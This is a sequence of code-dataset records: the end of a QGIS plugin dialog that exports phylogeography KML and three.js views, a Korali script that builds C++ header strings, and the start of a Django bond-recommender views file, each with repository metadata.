treenodes_filename=None):\n kml = \"\"\n if not treenodes_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenodes_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Tree Nodes Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenodes_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny HTU Nodes\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_branch(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_treenodes(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenodes_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n\n def generateGeophylogeny_TreeNetworks(self, treenetworks_filename=None):\n kml = \"\"\n if not treenetworks_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenetworks_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Tree Networks Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenetworks_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Tree Networks\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = build_kml_leaf(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_treenetworks(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenetworks_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n\n def generateGeophylogeny_RootPoint(self, treenetworks_filename=None):\n kml = \"\"\n if not treenetworks_filename:\n # file save dialog\n workdir = os.path.split(self.ui.lineEdit_GeoPath.text())[0]\n treenetworks_filename = QFileDialog.getSaveFileName(self, \"Save Phylogeography Reconstruction Root Point Data\", workdir, \"Keyhole Markup Laguage (*.kml)\")\n if not treenetworks_filename:\n return\n\n #advanced fields\n #TODO: Make flexible for future\n mydomain = \"http://nkresearch.ub.ac.id\"\n branch_color = \"FF00FF00\"\n branch_width = 3\n icon = \"http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png\"\n alt_grow = 1000\n proximity = 3\n title = \"Geophylogeny Tree Networks\"\n\n #Let's Rock\n\n #Retrieve dumped elements to string\n tree = str(self.ui.textEdit_Phylo.toPlainText()) #self.request.get('tree')\n coords = str(self.ui.textEdit_Coords.toPlainText()) #self.request.get('coords')\n #kmlMeta = 
build_kml_rootpoint(tree,coords,branch_color,branch_thickness,icon,alt_grow,proximity,title) #mydomain removed\n kmlMeta = build_kml_rootpoint(tree,coords,mydomain,branch_color,branch_width,icon,alt_grow,proximity,title)\n kml = kmlMeta.kml\n taxa = kmlMeta.taxa\n err = kmlMeta.err\n type = kmlMeta.type\n\n f = open(treenetworks_filename, 'w')\n f.write(str(kml))\n f.close()\n\n\n#Generate Geophylogeny Node and Branch Section End\n\n#Generate Geophylogeny Construct End\n\n#QGIS2threejs Section\n def settings(self, clean=False):\n # save settings of current panel\n item = self.ui.treeWidget.currentItem()\n if item and self.currentPage:\n self.saveProperties(item, self.currentPage)\n\n # plugin version\n self._settings[\"PluginVersion\"] = plugin_version\n\n # template and output html file path\n self._settings[\"Template\"] = self.ui.comboBox_Template.currentText()\n self._settings[\"OutputFilename\"] = self.ui.lineEdit_OutputFilename.text()\n\n if not clean:\n return self._settings\n\n # clean up settings - remove layers that don't exist in the layer registry\n registry = QgsMapLayerRegistry.instance()\n for itemId in [ObjectTreeItem.ITEM_OPTDEM, ObjectTreeItem.ITEM_POINT, ObjectTreeItem.ITEM_LINE, ObjectTreeItem.ITEM_POLYGON]:\n parent = self._settings.get(itemId, {})\n for layerId in parent.keys():\n if registry.mapLayer(layerId) is None:\n del parent[layerId]\n\n return self._settings\n\n def setSettings(self, settings):\n self._settings = settings\n\n # template and output html file path\n templateName = settings.get(\"Template\")\n if templateName:\n cbox = self.ui.comboBox_Template\n index = cbox.findText(templateName)\n if index != -1:\n cbox.setCurrentIndex(index)\n\n filename = settings.get(\"OutputFilename\")\n if filename:\n self.ui.lineEdit_OutputFilename.setText(filename)\n\n # update object tree\n self.ui.treeWidget.blockSignals(True)\n self.initObjectTree()\n self.ui.treeWidget.blockSignals(False)\n\n # update tree item visibility\n self.templateType = None\n self.currentTemplateChanged()\n\n def loadSettings(self):\n # file open dialog\n directory = QgsProject.instance().homePath()\n if not directory:\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filterString = \"Settings files (*.qto3settings);;All files (*.*)\"\n filename = QFileDialog.getOpenFileName(self, \"Load Export Settings\", directory, filterString)\n if not filename:\n return\n\n # load settings from file (.qto3settings)\n import json\n with open(filename) as f:\n settings = json.load(f)\n\n self.setSettings(settings)\n\n def saveSettings(self, filename=None):\n if not filename:\n # file save dialog\n directory = QgsProject.instance().homePath()\n if not directory:\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filename = QFileDialog.getSaveFileName(self, \"Save Export Settings\", directory, \"Settings files (*.qto3settings)\")\n if not filename:\n return\n\n # append .qto3settings extension if filename doesn't have\n if os.path.splitext(filename)[1].lower() != \".qto3settings\":\n filename += \".qto3settings\"\n\n # save settings to file (.qto3settings)\n import codecs\n import json\n with codecs.open(filename, \"w\", \"UTF-8\") as f:\n json.dump(self.settings(True), f, ensure_ascii=False, indent=2, sort_keys=True)\n\n logMessage(u\"Settings saved: {0}\".format(filename))\n\n def clearSettings(self):\n if QMessageBox.question(self, \"PhyloGeoRec\", \"Are you 
sure to clear all export settings?\", QMessageBox.Ok | QMessageBox.Cancel) == QMessageBox.Ok:\n self.setSettings({})\n\n def pluginSettings(self):\n from settingsdialog import SettingsDialog\n dialog = SettingsDialog(self)\n if dialog.exec_():\n self.pluginManager.reloadPlugins()\n self.pages[ppages.PAGE_DEM].initLayerComboBox()\n\n def showMessageBar(self, text, level=QgsMessageBar.INFO):\n # from src/gui/qgsmessagebaritem.cpp\n if level == QgsMessageBar.CRITICAL:\n msgIcon = \"/mIconCritical.png\"\n bgColor = \"#d65253\"\n elif level == QgsMessageBar.WARNING:\n msgIcon = \"/mIconWarn.png\"\n bgColor = \"#ffc800\"\n else:\n msgIcon = \"/mIconInfo.png\"\n bgColor = \"#e7f5fe\"\n stylesheet = \"QLabel {{ background-color:{0}; }}\".format(bgColor)\n\n label = self.ui.label_MessageIcon\n label.setPixmap(QgsApplication.getThemeIcon(msgIcon).pixmap(24))\n label.setStyleSheet(stylesheet)\n label.setVisible(True)\n\n label = self.ui.label_Status\n label.setText(text)\n label.setStyleSheet(stylesheet)\n\n def clearMessageBar(self):\n self.ui.label_MessageIcon.setVisible(False)\n self.ui.label_Status.setText(\"\")\n self.ui.label_Status.setStyleSheet(\"QLabel { background-color: rgba(0, 0, 0, 0); }\")\n\n def initTemplateList(self):\n cbox = self.ui.comboBox_Template\n cbox.clear()\n templateDir = QDir(tools.templateDir())\n for i, entry in enumerate(templateDir.entryList([\"*.html\", \"*.htm\"])):\n cbox.addItem(entry)\n\n config = tools.getTemplateConfig(entry)\n # get template type\n templateType = config.get(\"type\", \"plain\")\n cbox.setItemData(i, templateType, Qt.UserRole)\n\n # set tool tip text\n desc = config.get(\"description\", \"\")\n if desc:\n cbox.setItemData(i, desc, Qt.ToolTipRole)\n\n # select the template of the settings\n templatePath = self._settings.get(\"Template\")\n\n # if no template setting, select the last used template\n if not templatePath:\n #TODO: Fix UNICODE Bug, for now use UTF-8 instead\n templatePath = QSettings().value(\"/PhyloGeoRec/lastTemplate\", def_vals.template, type=unicode)\n #templatePath = QSettings().value(\"/PhyloGeoRec/lastTemplate\", def_vals.template, type=\"UTF-8\")\n\n if templatePath:\n index = cbox.findText(templatePath)\n if index != -1:\n cbox.setCurrentIndex(index)\n return index\n return -1\n\n def initObjectTree(self):\n tree = self.ui.treeWidget\n tree.clear()\n\n # add vector and raster layers into tree widget\n topItems = {}\n for id, name in zip(ObjectTreeItem.topItemIds, ObjectTreeItem.topItemNames):\n item = QTreeWidgetItem(tree, [name])\n item.setData(0, Qt.UserRole, id)\n topItems[id] = item\n\n optDEMChecked = False\n for layer in self.iface.legendInterface().layers():\n parentId = ObjectTreeItem.parentIdByLayer(layer)\n if parentId is None:\n continue\n\n item = QTreeWidgetItem(topItems[parentId], [layer.name()])\n isVisible = self._settings.get(parentId, {}).get(layer.id(), {}).get(\"visible\", False) #self.iface.legendInterface().isLayerVisible(layer)\n check_state = Qt.Checked if isVisible else Qt.Unchecked\n item.setData(0, Qt.CheckStateRole, check_state)\n item.setData(0, Qt.UserRole, layer.id())\n if parentId == ObjectTreeItem.ITEM_OPTDEM and isVisible:\n optDEMChecked = True\n\n for id, item in topItems.iteritems():\n if id != ObjectTreeItem.ITEM_OPTDEM or optDEMChecked:\n tree.expandItem(item)\n\n # disable additional DEM item which is selected as main DEM\n layerId = self._settings.get(ObjectTreeItem.ITEM_DEM, {}).get(\"comboBox_DEMLayer\")\n if layerId:\n self.primaryDEMChanged(layerId)\n\n def saveProperties(self, 
item, page):\n properties = page.properties()\n parent = item.parent()\n if parent is None:\n # top level item\n self._settings[item.data(0, Qt.UserRole)] = properties\n else:\n # layer item\n parentId = parent.data(0, Qt.UserRole)\n if parentId not in self._settings:\n self._settings[parentId] = {}\n self._settings[parentId][item.data(0, Qt.UserRole)] = properties\n\n def setCurrentTreeItemByData(self, data):\n it = QTreeWidgetItemIterator(self.ui.treeWidget)\n while it.value():\n if it.value().data(0, Qt.UserRole) == data:\n self.ui.treeWidget.setCurrentItem(it.value())\n return True\n it += 1\n return False\n\n def currentTemplateChanged(self, index=None):\n cbox = self.ui.comboBox_Template\n templateType = cbox.itemData(cbox.currentIndex(), Qt.UserRole)\n if templateType == self.templateType:\n return\n\n # hide items unsupported by template\n tree = self.ui.treeWidget\n for i, id in enumerate(ObjectTreeItem.topItemIds):\n hidden = (templateType == \"sphere\" and id != ObjectTreeItem.ITEM_CONTROLS)\n tree.topLevelItem(i).setHidden(hidden)\n\n # set current tree item\n if templateType == \"sphere\":\n tree.setCurrentItem(tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_CONTROLS)))\n elif self.lastTreeItemData is None or not self.setCurrentTreeItemByData(self.lastTreeItemData): # restore selection\n tree.setCurrentItem(tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_DEM))) # default selection for plain is DEM\n\n # display messages\n self.clearMessageBar()\n if templateType != \"sphere\":\n # show message if crs unit is degrees\n mapSettings = self.iface.mapCanvas().mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.iface.mapCanvas().mapRenderer()\n if mapSettings.destinationCrs().mapUnits() in [QGis.Degrees]:\n self.showMessageBar(\"The unit of current CRS is degrees, so terrain may not appear well.\", QgsMessageBar.WARNING)\n\n self.templateType = templateType\n\n def currentObjectChanged(self, currentItem, previousItem):\n # save properties of previous item\n if previousItem and self.currentPage:\n self.saveProperties(previousItem, self.currentPage)\n\n self.currentItem = currentItem\n self.currentPage = None\n\n # hide text browser and all pages\n self.ui.textBrowser.hide()\n for page in self.pages.itervalues():\n page.hide()\n\n parent = currentItem.parent()\n if parent is None:\n topItemIndex = currentItem.data(0, Qt.UserRole)\n pageType = self.topItemPages.get(topItemIndex, ppages.PAGE_NONE)\n page = self.pages.get(pageType, None)\n if page is None:\n self.showDescription(topItemIndex)\n return\n\n page.setup(self._settings.get(topItemIndex))\n page.show()\n\n else:\n parentId = parent.data(0, Qt.UserRole)\n layerId = currentItem.data(0, Qt.UserRole)\n layer = QgsMapLayerRegistry.instance().mapLayer(unicode(layerId))\n if layer is None:\n return\n\n layerType = layer.type()\n if layerType == QgsMapLayer.RasterLayer:\n page = self.pages[ppages.PAGE_DEM]\n page.setup(self._settings.get(parentId, {}).get(layerId, None), layer, False)\n elif layerType == QgsMapLayer.VectorLayer:\n page = self.pages[ppages.PAGE_VECTOR]\n page.setup(self._settings.get(parentId, {}).get(layerId, None), layer)\n else:\n return\n\n page.show()\n\n self.currentPage = page\n\n def objectItemChanged(self, item, column):\n parent = item.parent()\n if parent is None:\n return\n\n # checkbox of optional layer checked/unchecked\n if item == self.currentItem:\n if self.currentPage:\n # update enablement of property widgets\n self.currentPage.itemChanged(item)\n else:\n # 
select changed item\n self.ui.treeWidget.setCurrentItem(item)\n\n # set visible property\n #visible = item.data(0, Qt.CheckStateRole) == Qt.Checked\n #parentId = parent.data(0, Qt.UserRole)\n #layerId = item.data(0, Qt.UserRole)\n #self._settings.get(parentId, {}).get(layerId, {})[\"visible\"] = visible\n\n def primaryDEMChanged(self, layerId):\n tree = self.ui.treeWidget\n parent = tree.topLevelItem(ObjectTreeItem.topItemIndex(ObjectTreeItem.ITEM_OPTDEM))\n tree.blockSignals(True)\n for i in range(parent.childCount()):\n item = parent.child(i)\n isPrimary = item.data(0, Qt.UserRole) == layerId\n item.setDisabled(isPrimary)\n tree.blockSignals(False)\n\n def showDescription(self, topItemIndex):\n fragment = {ObjectTreeItem.ITEM_OPTDEM: \"additional-dem\",\n ObjectTreeItem.ITEM_POINT: \"point\",\n ObjectTreeItem.ITEM_LINE: \"line\",\n ObjectTreeItem.ITEM_POLYGON: \"polygon\"}.get(topItemIndex)\n\n url = \"http://qgis2threejs.readthedocs.org/en/docs-release/ExportSettings.html\"\n if fragment:\n url += \"#\" + fragment\n\n html = 'Online Help about this item'.format(url)\n self.ui.textBrowser.setHtml(html)\n self.ui.textBrowser.show()\n\n def numericFields(self, layer):\n # get attributes of a sample feature and create numeric field name list\n numeric_fields = []\n f = QgsFeature()\n layer.getFeatures().nextFeature(f)\n for field in f.fields():\n isNumeric = False\n try:\n float(f.attribute(field.name()))\n isNumeric = True\n except ValueError:\n pass\n if isNumeric:\n numeric_fields.append(field.name())\n return numeric_fields\n\n def mapTo3d(self):\n canvas = self.iface.mapCanvas()\n mapSettings = canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else canvas.mapRenderer()\n\n world = self._settings.get(ObjectTreeItem.ITEM_WORLD, {})\n bs = float(world.get(\"lineEdit_BaseSize\", def_vals.baseSize))\n ve = float(world.get(\"lineEdit_zFactor\", def_vals.zExaggeration))\n vs = float(world.get(\"lineEdit_zShift\", def_vals.zShift))\n\n return MapTo3D(mapSettings, bs, ve, vs)\n\n def progress(self, percentage=None, statusMsg=None):\n ui = self.ui\n if percentage is not None:\n ui.progressBar.setValue(percentage)\n if percentage == 100:\n ui.progressBar.setVisible(False)\n ui.label_Status.setText(\"\")\n else:\n ui.progressBar.setVisible(True)\n\n if statusMsg is not None:\n ui.label_Status.setText(statusMsg)\n ui.label_Status.repaint()\n QgsApplication.processEvents(QEventLoop.ExcludeUserInputEvents)\n\n def run(self):\n self.endPointSelection()\n\n ui = self.ui\n filename = ui.lineEdit_OutputFilename.text() # \"\"=Temporary file\n if filename and os.path.exists(filename):\n if QMessageBox.question(self, \"PhyloGeoRec\", \"Output file already exists. 
Overwrite it?\", QMessageBox.Ok | QMessageBox.Cancel) != QMessageBox.Ok:\n return\n\n # export to web (three.js)\n export_settings = ExportSettings(self.pluginManager, self.localBrowsingMode)\n export_settings.loadSettings(self.settings())\n export_settings.setMapCanvas(self.iface.mapCanvas())\n\n err_msg = export_settings.checkValidity()\n if err_msg is not None:\n QMessageBox.warning(self, \"PhyloGeoRec\", err_msg or \"Invalid settings\")\n return\n\n ui.pushButton_Run.setEnabled(False)\n ui.toolButton_Settings.setVisible(False)\n self.clearMessageBar()\n self.progress(0)\n\n if export_settings.exportMode == ExportSettings.PLAIN_MULTI_RES:\n # update quads and point on map canvas\n self.createRubberBands(export_settings.baseExtent, export_settings.quadtree())\n\n # export\n ret = exportToThreeJS(export_settings, self.iface.legendInterface(), self.objectTypeManager, self.progress)\n\n self.progress(100)\n ui.pushButton_Run.setEnabled(True)\n\n if not ret:\n ui.toolButton_Settings.setVisible(True)\n return\n\n self.clearRubberBands()\n\n # store last selections\n settings = QSettings()\n settings.setValue(\"/PhyloGeoRec/lastTemplate\", export_settings.templatePath)\n settings.setValue(\"/PhyloGeoRec/lastControls\", export_settings.controls)\n\n # open web browser\n if not tools.openHTMLFile(export_settings.htmlfilename):\n ui.toolButton_Settings.setVisible(True)\n return\n\n # close dialog\n QDialog.accept(self)\n\n def reject(self):\n # save properties of current object\n item = self.ui.treeWidget.currentItem()\n if item and self.currentPage:\n self.saveProperties(item, self.currentPage)\n\n self.endPointSelection()\n self.clearRubberBands()\n QDialog.reject(self)\n\n def help(self):\n url = \"http://qgis2threejs.readthedocs.org/\"\n\n import webbrowser\n webbrowser.open(url, new=2) # new=2: new tab if possible\n\n def startPointSelection(self):\n canvas = self.iface.mapCanvas()\n if self.previousMapTool != self.mapTool:\n self.previousMapTool = canvas.mapTool()\n canvas.setMapTool(self.mapTool)\n self.pages[ppages.PAGE_DEM].toolButton_PointTool.setVisible(False)\n\n def endPointSelection(self):\n self.mapTool.reset()\n if self.previousMapTool is not None:\n self.iface.mapCanvas().setMapTool(self.previousMapTool)\n\n def mapToolSet(self, mapTool):\n return\n #TODO: unstable\n if mapTool != self.mapTool and self.currentPage is not None:\n if self.currentPage.pageType == ppages.PAGE_DEM and self.currentPage.isPrimary:\n self.currentPage.toolButton_PointTool.setVisible(True)\n\n def createRubberBands(self, baseExtent, quadtree):\n self.clearRubberBands()\n # create quads with rubber band\n self.rb_quads = QgsRubberBand(self.iface.mapCanvas(), QGis.Line)\n self.rb_quads.setColor(Qt.blue)\n self.rb_quads.setWidth(1)\n\n quads = quadtree.quads()\n for quad in quads:\n geom = baseExtent.subrectangle(quad.rect).geometry()\n self.rb_quads.addGeometry(geom, None)\n self.log(\"Quad count: %d\" % len(quads))\n\n if not quadtree.focusRect:\n return\n\n # create a point with rubber band\n if quadtree.focusRect.width() == 0 or quadtree.focusRect.height() == 0:\n npt = quadtree.focusRect.center()\n self.rb_point = QgsRubberBand(self.iface.mapCanvas(), QGis.Point)\n self.rb_point.setColor(Qt.red)\n self.rb_point.addPoint(baseExtent.point(npt))\n\n def clearRubberBands(self):\n # clear quads and point\n if self.rb_quads:\n self.iface.mapCanvas().scene().removeItem(self.rb_quads)\n self.rb_quads = None\n if self.rb_point:\n self.iface.mapCanvas().scene().removeItem(self.rb_point)\n self.rb_point = None\n\n 
def browseClicked(self):\n directory = os.path.split(self.ui.lineEdit_OutputFilename.text())[0]\n if not directory:\n directory = QDir.homePath()\n filename = QFileDialog.getSaveFileName(self, self.tr(\"Output filename\"), directory, \"HTML file (*.html *.htm)\", options=QFileDialog.DontConfirmOverwrite)\n if not filename:\n return\n\n # append .html extension if filename doesn't have either .html or .htm\n if filename[-5:].lower() != \".html\" and filename[-4:].lower() != \".htm\":\n filename += \".html\"\n\n self.ui.lineEdit_OutputFilename.setText(filename)\n\n def log(self, msg):\n if debug_mode:\n qDebug(msg)\n\n#QGIS2threejs Section End\n\n#QGIS2threejs Class\n\nclass PointMapTool(QgsMapToolEmitPoint):\n\n def __init__(self, canvas):\n self.canvas = canvas\n QgsMapToolEmitPoint.__init__(self, self.canvas)\n self.point = None\n\n def canvasPressEvent(self, e):\n self.point = self.toMapCoordinates(e.pos())\n self.emit(SIGNAL(\"pointSelected()\"))\n\n\n#Changed By Maulana Malik Nashrulloh/3-6-16\nclass RectangleMapTool(QgsMapToolEmitPoint):\n\n def __init__(self, canvas):\n QgsMapToolEmitPoint.__init__(self, canvas)\n\n self.canvas = canvas\n self.rubberBand = QgsRubberBand(canvas, QGis.Polygon)\n self.rubberBand.setColor(QColor(255, 0, 0, 180))\n self.rubberBand.setWidth(1)\n self.reset()\n\n def reset(self):\n self.startPoint = self.endPoint = None\n self.isDrawing = False\n self.rubberBand.reset(QGis.Polygon)\n\n def canvasPressEvent(self, e):\n self.startPoint = self.toMapCoordinates(e.pos())\n self.endPoint = self.startPoint\n\n mapSettings = self.canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.canvas.mapRenderer()\n # mapSettings = self.canvas.mapSettings() if QGis.QGIS_VERSION_INT >= 20300 else self.canvas.mapRenderer()\n self.mupp = mapSettings.mapUnitsPerPixel()\n self.rotation = mapSettings.rotation() if QGis.QGIS_VERSION_INT >= 20700 else 0\n\n self.isDrawing = True\n self.showRect(self.startPoint, self.endPoint)\n\n def canvasReleaseEvent(self, e):\n self.isDrawing = False\n self.emit(SIGNAL(\"rectangleCreated()\"))\n\n def canvasMoveEvent(self, e):\n if not self.isDrawing:\n return\n self.endPoint = self.toMapCoordinates(e.pos())\n self.showRect(self.startPoint, self.endPoint)\n\n def showRect(self, startPoint, endPoint):\n self.rubberBand.reset(QGis.Polygon)\n if startPoint.x() == endPoint.x() and startPoint.y() == endPoint.y():\n return\n\n for i, pt in enumerate(self._rect(startPoint, endPoint).vertices()):\n self.rubberBand.addPoint(pt, bool(i == 3))\n self.rubberBand.show()\n\n def _rect(self, startPoint, endPoint):\n if startPoint is None or endPoint is None:\n return None\n\n p0 = self.toCanvasCoordinates(startPoint)\n p1 = self.toCanvasCoordinates(endPoint)\n canvas_rect = QgsRectangle(QgsPoint(p0.x(), p0.y()), QgsPoint(p1.x(), p1.y()))\n center = QgsPoint((startPoint.x() + endPoint.x()) / 2, (startPoint.y() + endPoint.y()) / 2)\n return RotatedRect(center, self.mupp * canvas_rect.width(), self.mupp * canvas_rect.height()).rotate(self.rotation, center)\n\n def rectangle(self):\n return self._rect(self.startPoint, self.endPoint)\n\n def setRectangle(self, rect):\n if rect == self._rect(self.startPoint, self.endPoint):\n return False\n\n v = rect.vertices()\n self.startPoint = v[3]\n self.endPoint = v[1]\n self.showRect(self.startPoint, self.endPoint)\n return True\n\n#QGIS2threejs Class 
End\n\n\n\n","repo_name":"mmnashrullah/PHYLOGEOrec-alpha","sub_path":"PhyloGeoRec/phylogeorecdialog.py","file_name":"phylogeorecdialog.py","file_ext":"py","file_size_in_byte":42937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"72005004794","text":"import sys\nfrom . import variables as vr\nfrom . import auxiliar as aux\nimport re\n\n\ndef checkHeaderTemplateString( moduleConfig, templateFilePath, moduleTemplate ):\n \"\"\"These keywords shouls appear only once\"\"\"\n\n substrings = ['__className__',\n '__parentClassName__']\n\n aux.checkNamespaceKeys(moduleConfig, templateFilePath, moduleTemplate)\n\ndef startNamespace(moduleConfig):\n \"\"\"String for the start the header namespace\"\"\"\n string = [ 'namespace ' + s + '\\n{\\n' for s in moduleConfig['Namespace'] ]\n string = ''.join(string)\n return string\n\ndef endNamespace(moduleConfig):\n \"\"\"String for the end the header namespace\"\"\"\n string = [ '} //' + s + '\\n' for s in reversed(moduleConfig['Namespace']) ]\n string = ''.join(string)\n return string\n\n\ndef createHeaderDeclarations(moduleConfig):\n \"\"\"String for variable declarations\"\"\"\n\n string = ' '\n if 'Configuration Settings' in moduleConfig:\n for v in moduleConfig[\"Configuration Settings\"]:\n string += '/**\\n '\n string += '* @brief ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Internal Settings' in moduleConfig:\n for v in moduleConfig[\"Internal Settings\"]:\n string += '/**\\n '\n string += '* @brief [Internal Use] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Termination Criteria' in moduleConfig:\n for v in moduleConfig[\"Termination Criteria\"]:\n string += '/**\\n '\n string += '* @brief [Termination Criteria] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' ' + vr.getVariableType(v) + ' ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n if 'Conditional Variables' in moduleConfig:\n for v in moduleConfig[\"Conditional Variables\"]:\n string += '/**\\n '\n string += '* @brief [Conditional Variable Value] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' double ' + vr.getCXXVariableName(v[\"Name\"]) + ';\\n '\n\n string += '/**\\n '\n string += '* @brief [Conditional Variable Reference] ' + v[\"Description\"] + '\\n '\n string += '*/\\n '\n string += ' std::string ' + vr.getCXXVariableName(v[\"Name\"]) + 'Conditional;\\n '\n\n return string\n\n\ndef createrClassDoxygenString( moduleConfig ):\n \"\"\"Creates the doxygen string for the class documentation\"\"\"\n string = '/**\\n'\n string += '* @brief Class declaration for module: ' + moduleConfig['Class Name'] + '.\\n'\n string += '*/\\n'\n return string\n\n\ndef createHeaderDoxygenString( moduleConfig ):\n \"\"\"Creates the doxygen string that goes to the top of the header file\"\"\"\n\n string = '/** \\\\namespace ' + moduleConfig['Namespace'][-1] + '\\n'\n string += '* @brief Namespace declaration for modules of type: ' + moduleConfig['Namespace'][-1] + '.\\n'\n string += '*/\\n\\n'\n\n string += '/** \\\\file\\n'\n string += '* @brief Header file for module: ' + moduleConfig[\"Class Name\"] + '.\\n'\n string += '*/\\n\\n'\n\n string += '/** \\\\dir ' + moduleConfig[\"Relative Path\"] + '\\n'\n string += '* @brief Contains code, documentation, and scripts for module: ' + 
moduleConfig[\"Class Name\"] + '.\\n'\n string += '*/\\n\\n'\n\n return string\n\n\ndef createOverrideFunctionString(moduleConfig):\n \"\"\"Creates the sting of overridden function declarations\"\"\"\n\n string = ' '\n if 'Termination Criteria' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Determines whether the module can trigger termination of an experiment run.\\n '\n string += '* @return True, if it should trigger termination; false, otherwise.\\n '\n string += '*/\\n '\n string += 'bool checkTermination() override;\\n '\n\n string += '/**\\n '\n string += '* @brief Obtains the entire current state and configuration of the module.\\n '\n string += '* @param js JSON object onto which to save the serialized state of the module.\\n '\n string += '*/\\n '\n string += 'void getConfiguration(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Sets the entire state and configuration of the module, given a JSON object.\\n '\n string += '* @param js JSON object from which to deserialize the state of the module.\\n '\n string += '*/\\n '\n string += 'void setConfiguration(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Applies the module\\'s default configuration upon its creation.\\n '\n string += '* @param js JSON object containing user configuration. The defaults will not override any currently defined settings.\\n '\n string += '*/\\n '\n string += 'void applyModuleDefaults(knlohmann::json& js) override;\\n '\n\n string += '/**\\n '\n string += '* @brief Applies the module\\'s default variable configuration to each variable in the Experiment upon creation.\\n '\n string += '*/\\n '\n string += 'void applyVariableDefaults() override;\\n '\n\n if 'Available Operations' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Runs the operation specified on the given sample. It checks recursively whether the function was found by the current module or its parents.\\n '\n string += \"* @param sample Sample to operate on. 
Should contain in the 'Operation' field an operation accepted by this module or its parents.\\n \"\n string += '* @param operation Should specify an operation type accepted by this module or its parents.\\n '\n string += '* @return True, if operation found and executed; false, otherwise.\\n '\n string += '*/\\n '\n string += 'bool runOperation(std::string operation, korali::Sample& sample) override;\\n '\n\n if 'Conditional Variables' in moduleConfig:\n string += '/**\\n '\n string += '* @brief Retrieves the pointer of a conditional value of a distribution property.\\n '\n string += '* @param property Name of the property to find.\\n '\n string += '* @return The pointer to the property..\\n '\n string += '*/\\n '\n string += 'double* getPropertyPointer(const std::string& property) override;\\n '\n\n return string","repo_name":"cselab/korali","sub_path":"tools/build/codeBuilders/header_builders.py","file_name":"header_builders.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"95"} +{"seq_id":"16700574279","text":"import os\nimport json\nfrom functools import lru_cache\nfrom urllib.parse import urlencode\n\nimport pandas as pd\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom BondRecommender.models import Securities, vanguard_merge\nfrom BondRecommender.data_loader import get_single_day_data, get_multi_day_data\nfrom BondRecommender.recommendation_models import similar_bonds_pipeline\nfrom BondRecommender.prediction_models import predict_single_rc\nfrom BondRecommender.bpr_model import BPRModel, ModelHelper\n\n@lru_cache(maxsize=16)\ndef get_bpr_model_helper():\n num_factors = 32\n \n isin_to_index_mapping_file = os.path.join(os.path.dirname(__file__), 'isin_to_index2.json')\n isin_to_index_mapping = json.load(open(isin_to_index_mapping_file))\n num_bonds = len(isin_to_index_mapping)\n \n model = BPRModel(num_bonds, num_factors)\n model_helper = ModelHelper(model, isin_to_index_mapping, get_single_day_data())\n \n weights_file = os.path.join(os.path.dirname(__file__), 'bpr_v2.pt')\n model_helper.load(weights_file)\n\n return model_helper \n\n\n# Create your views here.\ndef home(request):\n context = dict()\n return 